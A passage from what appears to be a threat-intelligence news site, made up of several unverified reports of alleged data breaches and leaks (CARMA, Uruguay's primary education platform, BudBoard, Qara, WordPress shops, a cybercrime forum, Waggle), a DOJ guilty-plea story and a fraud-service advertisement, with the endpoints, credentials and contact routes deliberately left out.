account is recent with no standing and **published an unrelated French database days earlier**. Contact routes are not reproduced here. The claim is **unverified** and the federation has not publicly addressed it. Want everything on this breach? **Paid subscribers** get the full claim details and more. Check out the [threat feed](https://darkwebinformer.com/threat-feed/), then after subscribing, search there for this alert. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### CARMA Client Data Allegedly for Sale, Configurations for 3,500+ Organisations Including Government Bodies URL: https://darkwebinformer.com/carma-client-data-allegedly-for-sale-configurations-for-3-500-organisations-including-government-bodies/ Last updated: 2026-08-06T20:25:11.000Z Breach Report Multi-Region Media Intelligence / SaaS Data for Sale ## CARMA Client Data Allegedly for Sale, Configurations for 3,500+ Organisations Including Government Bodies A seller posting as **2019** is advertising what they describe as data from **CARMA**, a global media intelligence firm providing media monitoring, social listening, and PR measurement to more than **3,500 organisations**, among them Fortune 500 companies, communications agencies, and **government ministries and public sector agencies**. The listing covers two tables: a **contact table** with names, email addresses, phone numbers, and street addresses, and a **client configuration table** holding account codes, country, active projects, selected industries, documents, subscription state, internal comments, and an **API token field**. Sample records show client accounts including a defence contractor. Price is by offer. The claim is **unverified**. Severity HIGH Organisations3,500+ Tables2 PriceBy offer Actor2019 ### ▣Post details TargetCARMA RegionsGlobal client base SectorMedia intelligence / Analytics ListingOne-time sale, crypto Clients3,500+ organisations DataContacts and client configs ObservedAug 6, 2026 Actor2019 ### !Allegedly included - Contact names - Email addresses - Phone numbers - Street addresses - Contact type flags - Client account names - Account codes & identifiers - Country - API tokens - Active project records - Selected industries - Subscription status - Attached documents - Internal account comments ### ◱Screenshot [ ![CARMA media intelligence client database sale listing screenshot, August 2026](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/9783259872613598716249876124987124.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/9783259872613598716249876124987124.png) ### ⚠Potential impact The distinctive exposure is not contact details but **what a media monitoring configuration reveals about its owner**. Selected industries, active projects, competitor lists, and internal account comments describe **what each organisation is watching and worried about**, which for a government ministry or defence contractor is strategic information in its own right. The presence of an **API token field** is the second concern, since tokens would reach client accounts directly, though sample records carry dates several years old and any credentials of that vintage may well have been rotated. The contact table appears to hold **communications and PR professionals**, a natural target for approaches aimed at influencing published messaging. ### iStatus Unverified Samples are published from both tables and the column structures are **internally consistent with a platform export** rather than an assembled list. Dates within the client sample cluster around **2019 and 2020**, suggesting the data may be considerably older than the listing date. Dark Web Informer is not reproducing the contact routes. Named client organisations are **customers of the platform, not the breached party**. The same account published an unrelated database two days earlier. The claim is **unverified** and CARMA has not publicly addressed it. Want everything on this breach? **Paid subscribers** get the full claim details and more. Check out the [threat feed](https://darkwebinformer.com/threat-feed/), then after subscribing, search there for this alert. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### Uruguay's Primary Education Databases Allegedly Breached, 1M+ Children's Records Offered for Sale and Query URL: https://darkwebinformer.com/uruguays-primary-education-databases-allegedly-breached-1m-childrens-records-offered-for-sale-and-query/ Last updated: 2026-08-06T15:52:44.000Z Breach Report ![Uruguay flag](https://flagcdn.com/w40/uy.png)Uruguay Government / Primary Education Sold as a Service ## Uruguay's Primary Education Databases Allegedly Breached, 1M+ Children's Records Offered for Sale and Query An actor posting as **LaPampaLeaks** claims to hold the databases behind **GURI**, the student management platform operated by Uruguay's **CEIP** primary education council, covering pupils enrolled between **2012 and 2025**. The listing describes a family application database of **1,144,324 records** alongside enrolment databases totalling **3.2 million**. Fields named include **national identity numbers, full names, dates of birth, home addresses, phone numbers, email addresses, family identifiers, and the specific school and class each child attended**. Beyond the sale, the actor states the data is **already loaded into a subscription service allowing clients to look up any Uruguayan citizen's school history**. The claim is **unverified**. Severity CRITICAL Family app records1,144,324 Enrolment records3.2M Range2012–2025 ActorLaPampaLeaks ### ▣Post details TargetCEIP / GURI platform Country![Uruguay flag](https://flagcdn.com/w40/uy.png)Uruguay SectorGovernment / Primary education ListingHighest bidder, no set price SubjectsSchoolchildren and families Also offeredQuery service subscription ObservedAug 6, 2026 ActorLaPampaLeaks ### !Allegedly included - National ID numbers - Full names - Dates of birth - Home addresses - Phone numbers - Email addresses - Family ID numbers - Parent relationship records - School name & number - Class and year attended - Department & jurisdiction - Gender - Socio-cultural classification - Registration dates ### ◱Screenshots [ ![Uruguay CEIP GURI education database sale listing screenshot, August 2026 (1 of 2)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/129738569287365982736498712645978198745.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/129738569287365982736498712645978198745.png) [ ![Uruguay CEIP GURI education database sale listing screenshot, August 2026 (2 of 2)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/129738569287365982736498712645978198746.png) Screenshot 2 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/129738569287365982736498712645978198746.png) ### ⚠Potential impact The subjects here are **children**, and the field combination is the concern rather than the volume. A record pairing a named child's **date of birth and home address with the specific school and class they attend** is a location dataset, not a marketing one, and no remediation exists for it: a child cannot change their identity number, their address, or where they went to school. The **family identifiers extend the exposure to parents and siblings**. What distinguishes this listing is that the data is described as **already queryable through a paid service**, which lowers the barrier from acquiring a database to simply searching a name, and the actor markets that capability for confirming a person's identity and reconstructing who they knew. ### iStatus Unverified The post includes record samples and screenshots of what appear to be **authenticated queries against live endpoints**, suggesting access may be ongoing rather than historical. Dark Web Informer is **not reproducing the endpoints, parameters, or contact channels**. The actor alleges CEIP previously characterised this as a limited cybersecurity incident and took its platform offline for a week without disclosing the scope; that account is the actor's own and is uncorroborated. The claim is **unverified** and CEIP has not addressed this listing. Want everything on this breach? **Paid subscribers** get the full claim details and more. Check out the [threat feed](https://darkwebinformer.com/threat-feed/), then after subscribing, search there for this alert. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### Canadian Hacker Pleads Guilty in Cloud Breach Spree Affecting More Than 165 Organizations URL: https://darkwebinformer.com/canadian-hacker-pleads-guilty-in-cloud-breach-spree-affecting-more-than-165-organizations/ Last updated: 2026-08-05T18:36:52.000Z A Canadian man has pleaded guilty to participating in a widespread cloud hacking and extortion campaign that compromised more than 165 organizations and exposed information belonging to at least 100 million people. Connor Riley Moucka, 26, of Kitchener, Ontario, entered guilty pleas to computer fraud, wire fraud, aggravated identity theft, and a related conspiracy. The [Justice Department announced the plea](https://www.justice.gov/opa/pr/canadian-man-pleads-guilty-hacking-us-cloud-storage-provider-and-extorting-its-customers) on August 5, 2026. ### Stolen Credentials Used to Access Cloud Data Between February and October 2024, Moucka and his co-conspirators used stolen login credentials to access cloud-hosted information belonging to customers of a U.S.-based software-as-a-service provider. The attackers compromised accounts belonging to at least 165 customer organizations and downloaded terabytes of information containing [billions of sensitive records](https://www.justice.gov/opa/pr/canadian-man-pleads-guilty-hacking-us-cloud-storage-provider-and-extorting-its-customers). The stolen information included: - Non-content call and text history records - Banking and other financial information - Payroll records - Driver’s license and passport numbers - Social Security numbers - Drug Enforcement Administration registration numbers - Other personally identifiable information The provider is not identified in the Justice Department’s plea announcement. The campaign has been widely linked to compromises involving customers of cloud data platform Snowflake. ### Victims Paid More Than $2.5 Million After stealing the information, Moucka and other members of the operation threatened to publish it unless the affected organizations paid ransoms. The conspirators received more than [$2.5 million in ransom payments](https://www.justice.gov/opa/pr/canadian-man-pleads-guilty-hacking-us-cloud-storage-provider-and-extorting-its-customers). Prosecutors say Moucka personally obtained at least $495,000 through the scheme. In at least one case, Moucka attempted to extort a victim again after an earlier payment. He used stolen information involving a government officer and members of a former government officer’s immediate family while threatening further disclosure. The stolen datasets were also advertised for sale through BreachForums, Exploit.in, XSS.is, and Telegram. ### At Least 100 Million People Affected The affected companies suffered more than $9.5 million in documented losses, according to prosecutors. That figure does not include losses suffered by the organizations’ customers. DOJ estimates that the compromised records involved [at least 100 million individuals](https://www.justice.gov/opa/pr/canadian-man-pleads-guilty-hacking-us-cloud-storage-provider-and-extorting-its-customers). The scale of the stolen information substantially increased the potential harm. Financial information and government identification numbers can support identity theft and fraud, while call and text history records can reveal sensitive personal and professional relationships. ### Extradited From Canada Moucka was arrested in Canada in October 2024 and later agreed to surrender for extradition to the United States. He arrived in the Western District of Washington and made his first U.S. court appearance on July 3, 2025\. The Justice Department’s [case information page](https://www.justice.gov/usao-wdwa/united-states-vs-connor-riley-moucka-and-john-erin-binns) lists aliases associated with Moucka including “Alexander Antonin Moucka,” “judische,” “catist,” “waifu,” and “ellye18.” Several international agencies assisted with the investigation and arrest, including the Royal Canadian Mounted Police, Australian Federal Police, Spain’s Guardia Civil, the Security Service of Ukraine, and the Turkish National Police. Co-defendant John Erin Binns, also known online as “irdev” and “j\_irdev1337,” is not presently in U.S. custody. ### Sentencing Scheduled for October Moucka is scheduled to be sentenced on October 27, 2026. The aggravated identity theft conviction carries a mandatory minimum sentence of two years in prison. He also faces maximum penalties totaling up to 30 years on the remaining counts, although the final sentence will be determined by a federal judge after considering statutory factors and the U.S. Sentencing Guidelines. The case forms part of Operation Riptide, an FBI campaign targeting the people, infrastructure, and financial networks supporting cybercrime and online fraud. The guilty plea highlights a recurring weakness in cloud environments. Attackers do not always need to compromise the cloud provider itself. Stolen credentials, accounts without strong multifactor authentication, excessive access privileges, and poor monitoring can provide a direct route into large collections of centralized customer data. ### BudBoard Storage Bucket Allegedly Left Public, Exposing 18 Dispensaries and a Production POS Integration Key URL: https://darkwebinformer.com/budboard-storage-bucket-allegedly-left-public-exposing-18-dispensaries-and-a-production-pos-integration-key/ Last updated: 2026-08-05T17:14:45.000Z Breach Report ![United States flag](https://flagcdn.com/w40/us.png)United States Cannabis Tech / SaaS Reported Live ## BudBoard Storage Bucket Allegedly Left Public, Exposing 18 Dispensaries and a Production POS Integration Key An actor posting as **exfilar** claims that **BudBoard**, a US cannabis digital signage platform providing dispensary screen management and point-of-sale integration, left its cloud storage bucket **publicly readable with no authentication**. The bucket is said to contain **two full database export snapshots from 2024**, covering **58 staff accounts across 18 dispensary and brand clients** in the United States, Canada, and Australia, along with client configurations, addresses, and subscription data. The actor states the bucket also held a **screenshot displaying a production API key for a major cannabis POS platform**, which if valid would reach beyond BudBoard into its clients' retail systems. Access is reported as **still live**. The claim is **unverified**. Severity CRITICAL StatusReported live Client firms18 Staff accounts58 Actorexfilar ### ▣Post details TargetBudBoard Country![United States flag](https://flagcdn.com/w40/us.png)United States SectorCannabis retail technology ListingReply or upgrade to unlock Volume500+ files / 212MB CauseClaimed misconfiguration ObservedAug 5, 2026 Actorexfilar ### !Allegedly included - Staff email addresses - Display names - Account identifiers - Permission roles - Dispensary client names - Dispensary addresses - Location coordinates - Subscription & billing tier - Payment bypass flags - Product display settings - Potency configuration - Screen layouts - Integration endpoints - POS API key screenshot ### ◱Screenshots [ ![BudBoard cannabis signage platform data exposure forum post screenshot, August 2026 (1 of 3)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/459278659872659872365987236498762598723.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/459278659872659872365987236498762598723.png) [ ![BudBoard cannabis signage platform data exposure forum post screenshot, August 2026 (2 of 3)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/459278659872659872365987236498762598724.png) Screenshot 2 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/459278659872659872365987236498762598724.png) [ ![BudBoard cannabis signage platform data exposure forum post screenshot, August 2026 (3 of 3)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/459278659872659872365987236498762598725.png) Screenshot 3 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/459278659872659872365987236498762598725.png) ### ⚠Potential impact Fifty-eight accounts understates this. The consequential item is the **exposed integration key for a downstream POS platform**: if valid, it would reach the retail systems of every dispensary using that integration, where inventory, sales, and **state seed-to-sale compliance records** are held. It should be stated plainly that **the post evidences an exposed key, not confirmed access to any dispensary's systems**, and that distinction matters. The sector sharpens the stakes. Cannabis purchase records carry consequences that ordinary retail data does not, touching employment, firearms eligibility, benefits, and immigration status, and dispensaries are **regulated operators whose compliance data has legal weight**. Client configurations also expose commercial terms and a payment bypass flag. ### iStatus Unverified The post includes an infrastructure map, retrieval paths, and staff credentials, **none of which Dark Web Informer is reproducing while the exposure is reported as unremediated**. The actor claims the platform's cloud provider sent automated insecurity warnings for roughly two years without response, which is uncorroborated. This is described as the fourth of 25 releases from the same automated scanning tool behind a separate disclosure published today. Named dispensaries are **clients of the platform, not the breached party**. The claim is **unverified**. Want everything on this breach? **Paid subscribers** get the full claim details and more. Check out the [threat feed](https://darkwebinformer.com/threat-feed/), then after subscribing, search there for this alert. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### Twelve Databases Leaked in Single Dump, 14,453 Customer Records From WordPress Sites Exposed URL: https://darkwebinformer.com/twelve-databases-leaked-in-single-dump-14-453-customer-records-from-wordpress-sites-exposed/ Last updated: 2026-08-05T17:01:30.000Z Breach Report Multi-Region WordPress / E-commerce Free Download ## Twelve Databases Leaked in Single Dump, 14,453 Customer Records From WordPress Sites Exposed A forum user posting as **NightBroker** has published **12 databases** in a single release, claiming the sites were located through search engine reconnaissance and required minimal effort to access. The dump holds **14,453 customer records** across eleven small businesses and organisations, plus a twelfth file listing **216,470 usernames** from a language-learning platform with no further personal data attached. Column structures identify every affected site as running **WordPress with the WooCommerce store plugin**. Exposed fields include names, emails, phone numbers, **full billing and shipping addresses**, order history, payment processor references, session tokens with IP addresses, and **password hashes in WordPress's legacy format**. The claim is **unverified**. Severity HIGH Customer records14,453 Databases12 PriceFree ActorNightBroker ### ▣Post details Targets12 unrelated sites RegionsIE, ZA, NZ, DE, TR, IN, AT, US SectorSmall business e-commerce ListingFree — points to unlock Records14,453 + 216,470 usernames PlatformWordPress / WooCommerce ObservedAug 5, 2026 ActorNightBroker ### !Sites affected - tatoeba.org — 216,470 - bodygraphicstattoosupply.co.za — 3,257 - ferminiatures.com — 3,257 - sahabatgenpro.com — 2,777 - mesa.com.tr — 1,978 - blusheshairsalon.com — 1,052 - skifederation.org — 906 - willrich.com — 271 - weingut-topf.at — 144 - museumtrade.org — 96 - webcomsystems.in — 57 - knoxfocus.com — 12 ### ◱Screenshots [ ![Multi-leak of twelve WordPress databases forum post screenshot, August 2026 (1 of 3)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/432597823597862359867239876598723.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/432597823597862359867239876598723.png) [ ![Multi-leak of twelve WordPress databases forum post screenshot, August 2026 (2 of 3)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/432597823597862359867239876598724.png) Screenshot 2 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/432597823597862359867239876598724.png) [ ![Multi-leak of twelve WordPress databases forum post screenshot, August 2026 (3 of 3)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/432597823597862359867239876598725.png) Screenshot 3 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/432597823597862359867239876598725.png) ### ⚠Potential impact The **password hashes are the material concern**. WordPress's legacy hashing scheme, visible throughout the samples, is **far weaker than modern alternatives and crackable at scale**, so recovered passwords will unlock any other account where a customer reused them. Beyond that the records carry **home addresses, phone numbers, and order history**, and the session data embeds IP addresses and device details, allowing rough location and device profiling. The headline 216,470 figure is **usernames only and carries little sensitivity**. The wider point is the pattern: these are small businesses without security staff, found in bulk, and **unlikely to notify anyone**. ### iStatus Unverified Samples and full column listings are published for three of the twelve, and the **schemas are internally consistent with genuine WordPress exports** rather than assembled lists. The actor states these were incidental finds outside their usual focus, and published the collection without payment. The account is established with moderate standing. Nothing has been independently corroborated. The claim is **unverified** and none of the affected sites has publicly addressed it. Want everything on this breach? **Paid subscribers** get the full claim details and more. Check out the [threat feed](https://darkwebinformer.com/threat-feed/), then after subscribing, search there for this alert. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### Qara Platform Allegedly Exposed, Actor Claims Live Write Access to App Deployment for Saint-Gobain, Lidl and SPAR URL: https://darkwebinformer.com/qara-platform-allegedly-exposed-actor-claims-live-write-access-to-app-deployment-for-saint-gobain-lidl-and-spar/ Last updated: 2026-08-05T16:44:27.000Z Breach Report ![Egypt flag](https://flagcdn.com/w40/eg.png)Egypt Supply Chain / SaaS Reported Live ## Qara Platform Allegedly Exposed, Actor Claims Live Write Access to App Deployment for Saint-Gobain, Lidl and SPAR An actor posting as **exfilar** claims that **Qara**, an Egyptian supply-chain SaaS platform handling QR anti-counterfeit, feature flags, and mobile app deployment for **14+ enterprise tenants**, left its backend databases publicly readable **and writable** with no authentication. The actor states they **modified a production deployment configuration belonging to Saint-Gobain, confirmed it persisted, then reverted it**. The dump also covers a Saudi government health and safety application, including **119 government cash voucher records**, a national governorate and district dataset, session tokens, and **12 plaintext employee passwords**. The actor reports the access **remained live as of 5 August**. The claim is **unverified**. Severity CRITICAL StatusReported live Tenants14+ Cash vouchers119 Actorexfilar ### ▣Post details TargetQara Country![Egypt flag](https://flagcdn.com/w40/eg.png)Egypt SectorSupply chain SaaS ListingReply or upgrade to unlock Volume32 files / 245MB decompressed CauseClaimed misconfiguration ObservedAug 5, 2026 Actorexfilar ### !Allegedly included - Plaintext employee passwords - Database admin keys - Search cluster API key - 659 session tokens - Deployment configurations - Feature flag controls - Tenant application configs - 119 government cash vouchers - Voucher IDs & amounts - Wallet transaction entries - National geographic dataset - Phone numbers - IP addresses & user agents - Supplier data ### ◱Screenshots [ ![Qara supply chain SaaS platform data exposure forum post screenshot, August 2026 (1 of 3)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/87632148957618972458729653897235871.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/87632148957618972458729653897235871.png) [ ![Qara supply chain SaaS platform data exposure forum post screenshot, August 2026 (2 of 3)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/87632148957618972458729653897235872.png) Screenshot 2 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/87632148957618972458729653897235872.png) [ ![Qara supply chain SaaS platform data exposure forum post screenshot, August 2026 (3 of 3)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/87632148957618972458729653897235873.png) Screenshot 3 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/87632148957618972458729653897235873.png) ### ⚠Potential impact The stolen data is secondary here. **Write access to a database that governs mobile app deployment is a supply-chain compromise**, because whoever holds it can alter what software reaches every tenant's workforce. The actor states this was demonstrated against a named multinational and then reverted, meaning the capability was **proven rather than theorised**. Downstream tenants span construction materials, two major European grocery chains, and a Saudi government body, none of which were themselves breached but all of which inherit the exposure. Separately, **government cash vouchers are financial instruments**, and plaintext credentials reported as still valid make this an **ongoing rather than historical** incident. ### iStatus Unverified The post is unusually detailed, including an infrastructure map, credentials, and an access-status check dated today, **none of which Dark Web Informer is reproducing while the exposure is reported as unremediated**. The actor describes this as the third of roughly 25 planned releases from an automated scanning tool, indicating further targets. Named tenants are **customers of the platform, not the breached party**. Nothing has been independently corroborated. The claim is **unverified** and none of the parties has publicly addressed it. Want everything on this breach? **Paid subscribers** get the full claim details and more. Check out the [threat feed](https://darkwebinformer.com/threat-feed/), then after subscribing, search there for this alert. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### Branch Furniture Customer Database Allegedly for Sale, 480,276 Records Listed at $200 URL: https://darkwebinformer.com/branch-furniture-customer-database-allegedly-for-sale-480-276-records-listed-at-200/ Last updated: 2026-08-04T17:48:21.000Z Breach Report ![United States flag](https://flagcdn.com/w40/us.png)United States E-commerce / Furniture Data for Sale ## Branch Furniture Customer Database Allegedly for Sale, 480,276 Records Listed at $200 A seller posting as **dreamss** is advertising what they describe as the customer database of **Branch Furniture**, a US direct-to-consumer office furniture company selling to home offices, startups, and businesses. The listing claims **480,276 lines** in a 36.4MB file, dated **July 2026**. The posted sample shows a narrow but personal field set: **first and last name, country, phone number, street address, email address, and a partial date of birth** giving year and month. No passwords, order details, or payment data appear. The asking price is **$200**. The claim is **unverified**. Severity HIGH Records480,276 Size36.4MB Price$200 Actordreamss ### ▣Post details TargetBranch Furniture Country![United States flag](https://flagcdn.com/w40/us.png)United States SectorE-commerce / Office furniture ListingData for sale — $200 Records480,276 lines DatedJuly 2026 ObservedAug 2, 2026 Actordreamss ### !Allegedly included - First names - Last names - Street addresses - Phone numbers - Email addresses - Birth year and month - Country ### ◱Screenshot [ ![Branch Furniture US customer database sale listing screenshot, August 2026](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/9478265872635786923598762687935987623.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/9478265872635786923598762687935987623.png) ### ⚠Potential impact There are no credentials or payment details here, but the combination is a **usable identity starting point**: name, home address, phone, email, and birth month and year. The partial date of birth is the notable field, since it is **less than full verification data but enough to narrow identity** and to answer common security questions. The sample also indicates the customer base **skews markedly older**, with many birth years in the 1930s to 1950s and a heavy prevalence of legacy internet provider email domains. Older consumers are a documented target for telephone and mail fraud, which makes the phone and address fields more consequential than the record count alone suggests. ### iStatus Unverified The stated file size works out to roughly **76 bytes per record**, which is proportionate to the seven fields shown and supports internal consistency. Against that, **$200 for 480,000 records is very low**, pricing more typical of recycled or non-exclusive material than a fresh exclusive dataset. The seller account is recent with no standing, and contact routes are not reproduced here. Nothing has been independently corroborated. The claim is **unverified** and Branch Furniture has not publicly addressed it. Want everything on this breach? **Paid subscribers** get the full claim details and more. Check out the [threat feed](https://darkwebinformer.com/threat-feed/), then after subscribing, search there for this alert. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### Ramp4u Cybercrime Forum Allegedly Breached, 340,000 IP Logs and Private Messages Published URL: https://darkwebinformer.com/ramp4u-cybercrime-forum-allegedly-breached-340-000-ip-logs-and-private-messages-published/ Last updated: 2026-08-04T16:43:57.000Z Breach Report Jurisdiction Unclear Cybercrime Forum Free Download ## Ramp4u Cybercrime Forum Allegedly Breached, 340,000 IP Logs and Private Messages Published A forum user posting as **kitta** has published what they describe as the database of **Ramp4u**, a Russian-language cybercrime and dark web forum. The breach is dated to **March 2024** and claimed to cover **7,709 users**. Beyond usernames, email addresses, and credential hashes, the release includes the forum's **private message table**, its posts and threads, and **340,333 IP log entries**. In this case the exposed population is the forum's own membership, which inverts the usual reading: the **harm to the public is limited, while the value to investigators is not**. The claim is **unverified**. Severity MODERATE IP logs340,333 Users7,709 Private messages3,875 Actorkitta ### ▣Post details TargetRamp4u JurisdictionNot established SectorCybercrime forum ListingFree — reply to unlock Users7,709 Content7,784 posts / 1,732 threads Breach datedMarch 2024 Actorkitta ### !Allegedly included - Usernames - Email addresses - Password hashes & salts - IP address logs - Private messages - Posts & threads - Registration timestamps - Last visit timestamps - Timezone settings - Account status flags ### ◱Screenshot [ ![Ramp4u Russian-language cybercrime forum database leak post screenshot, August 2026](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/12389765978236567823587929873568792345.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/12389765978236567823587929873568792345.png) ### ⚠Potential impact The **IP log table is the significant asset**, not the user count. Forum members typically connect through VPNs or Tor, but across 340,000 log entries a **single lapse is statistically likely**, and one unprotected login is enough to tie a handle to a person. Attribution value does not decay the way operational data does, so the March 2024 date matters little. The **private messages** compound this, since operational negotiation tends to be franker than public posting. Reused email addresses allow correlation against other datasets. Sample usernames reference known ransomware brands, though a chosen handle **evidences nothing about identity**. ### iStatus Unverified The sample shows a **standard forum software user table**, consistent with a database export rather than an assembled list. The data is **roughly two and a half years old** and may already have circulated privately before this release. The same account published two unrelated databases within the past fortnight. Nothing has been independently corroborated, and the forum's operators are in no position to confirm or deny. The claim is **unverified**. Want everything on this breach? **Paid subscribers** get the full claim details and more. Check out the [threat feed](https://darkwebinformer.com/threat-feed/), then after subscribing, search there for this alert. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### Vendor Advertises Fraudulently Verified Crypto Exchange Accounts With European Bank Rails URL: https://darkwebinformer.com/vendor-advertises-fraudulently-verified-crypto-exchange-accounts-with-european-bank-rails/ Last updated: 2026-08-04T16:34:46.000Z Service Listing Multi-Region Financial Crime / KYC Bypass Fraud Service ## Vendor Advertises Fraudulently Verified Crypto Exchange Accounts With European Bank Rails A seller posting as **RasselKyc** is advertising **made-to-order cryptocurrency exchange accounts** registered under names supplied by the buyer. The seller states they fabricate an identity document and complete the platform's verification process on the buyer's behalf, with delivery in **one to 48 hours**. Accounts are offered on **Bitget, Bitvavo, and Kraken** at **$150 to $300** each, and are advertised as arriving with **French, Dutch, and German IBANs**, SEPA Instant transfer capability, peer-to-peer trading access, and a virtual card. The exchanges named are the **platforms being defrauded**, not parties to the offer. No breach is claimed. Severity MODERATE Price$150–300 Delivery1–48 hours Bank railsSEPA ActorRasselKyc ### ▣Listing details TypeService, not a breach Platforms abusedBitget, Bitvavo, Kraken SectorFinancial crime / AML evasion OfferAccounts in buyer-chosen names IBANsFR, NL, DE TermsEscrow accepted ObservedAug 4, 2026 ActorRasselKyc ### !Advertised features - Buyer-specified account name - Fabricated identity document - Verification completed by seller - French IBAN - Dutch IBAN - German IBAN - SEPA Instant transfers - Peer-to-peer trading - Virtual card - Escrow via forum ### ◱Screenshot [ ![Vendor advertisement for fraudulently verified cryptocurrency exchange accounts, August 2026](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/72368589873926459872358967923.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/72368589873926459872358967923.png) ### ⚠Potential impact Nothing has been breached, but this is the **layer that makes other crime payable**. Verified exchange accounts with European IBANs and instant SEPA transfers are the standard route for moving proceeds of fraud, ransomware, and scam payouts through regulated institutions under a fabricated identity. The **buyer-chosen name is the significant detail**: an account can be made to match a stolen identity, a shell company, or a name a victim already expects to pay. At $150 to $300 the pricing implies **volume rather than bespoke work**, and the offer being repeated across three platforms suggests a reproducible method rather than a one-off. ### iStatus Advertisement This is a solicitation rather than an incident, so there is nothing to verify beyond the post. The account was **registered around two months ago and holds a single post with no feedback**, so no delivery record supports the claims. Dark Web Informer is not reproducing the contact route. Whether the seller can deliver, or is running an advance-fee scam against other criminals, cannot be established. Want everything on this breach? **Paid subscribers** get the full claim details and more. Check out the [threat feed](https://darkwebinformer.com/threat-feed/), then after subscribing, search there for this alert. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### Waggle Database Allegedly Leaked, 106,800+ Pet Camera Customers Exposed Across Three Tables URL: https://darkwebinformer.com/waggle-database-allegedly-leaked-106-800-pet-camera-customers-exposed-across-three-tables/ Last updated: 2026-08-04T16:25:33.000Z Breach Report ![United States flag](https://flagcdn.com/w40/us.png)United States Pet Technology / IoT Free Download ## Waggle Database Allegedly Leaked, 106,800+ Pet Camera Customers Exposed Across Three Tables A forum user posting as **2019** has published what they describe as the customer database of **Waggle**, a US pet technology company whose products include a smart camera offering live video, two-way audio, treat dispensing, and real-time alerts. The release comprises **three separate tables** covering more than **106,800 customers**: a contact table with names, emails, phone numbers, and **home addresses**; a **billing table** with invoice references, subscription plans, payment processor identifiers, due and unpaid dates, and account status; and a review table with usernames and comment history. The data is offered as a free download. The claim is **unverified**. Severity HIGH Customers106,800+ Tables3 PriceFree Actor2019 ### ▣Post details TargetWaggle Country![United States flag](https://flagcdn.com/w40/us.png)United States SectorPet technology / Connected devices ListingFree — reply to unlock Customers106,800+ DataContact, billing, reviews ObservedAug 4, 2026 Actor2019 ### !Allegedly included - Customer 